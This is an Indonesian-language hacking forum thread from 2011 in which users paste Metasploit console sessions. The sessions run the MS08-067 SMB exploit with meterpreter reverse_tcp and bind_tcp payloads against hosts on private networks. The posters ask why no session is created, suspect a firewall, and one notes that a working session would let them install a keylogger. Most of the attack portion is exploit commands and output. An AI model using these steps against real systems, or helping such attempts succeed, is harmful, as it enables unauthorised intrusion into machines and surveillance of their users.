msfpayload windows/shell/reverse_tcp
#8
(09-14-2011, 03:20 PM)ririaz Wrote: kaya gini gmn om nya:

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > use exploit/windows/sm
use exploit/windows/smb/ms03_049_netapi use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms04_007_killbill use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
use exploit/windows/smb/ms04_011_lsass use exploit/windows/smb/ms10_061_spoolss
use exploit/windows/smb/ms04_031_netdde use exploit/windows/smb/netidentity_xtierrpcpipe
use exploit/windows/smb/ms05_039_pnp use exploit/windows/smb/psexec
use exploit/windows/smb/ms06_025_rasmans_reg use exploit/windows/smb/smb_relay
use exploit/windows/smb/ms06_025_rras use exploit/windows/smb/timbuktu_plughntcommand_bof
use exploit/windows/smb/ms06_040_netapi use exploit/windows/smtp/mailcarrier_smtp_ehlo
use exploit/windows/smb/ms06_066_nwapi use exploit/windows/smtp/mercury_cram_md5
use exploit/windows/smb/ms06_066_nwwks use exploit/windows/smtp/ms03_046_exchange2000_xexch50
use exploit/windows/smb/ms06_070_wkssvc use exploit/windows/smtp/wmailserver
use exploit/windows/smb/ms07_029_msdns_zonename use exploit/windows/smtp/ypops_overflow1
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.88.252
LHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > set RHOST 192.168.88.252
RHOST => 192.168.88.252
msf exploit(ms08_067_netapi) > exploit

[-] Handler failed to bind to 192.168.88.252:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

ini kayaknya g jalan,, perhatika but no session was created.,,, mirip yang saya coba kan kemaren",,g berhasill,,
seperti nya ke blok firewall,,
@ kak zhee,, saya coba pake meterpreter bind_tcp jga no session was created ,,gimana itu??
kalo g salah kalo session nya ada,kita bisa pasa keylogger juga


ini erronya punya saya kak zhee

=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops

msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set DCERPC::fake_bind_multi false
DCERPC::fake_bind_multi => false
msf exploit(ms08_067_netapi) > set RHOST 172.16.40.75
RHOST => 172.16.40.75
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.



Messages In This Thread
RE: msfpayload windows/shell/reverse_tcp - by Junior Riau - 09-14-2011, 09:40 PM




Users browsing this thread: 1 Guest(s)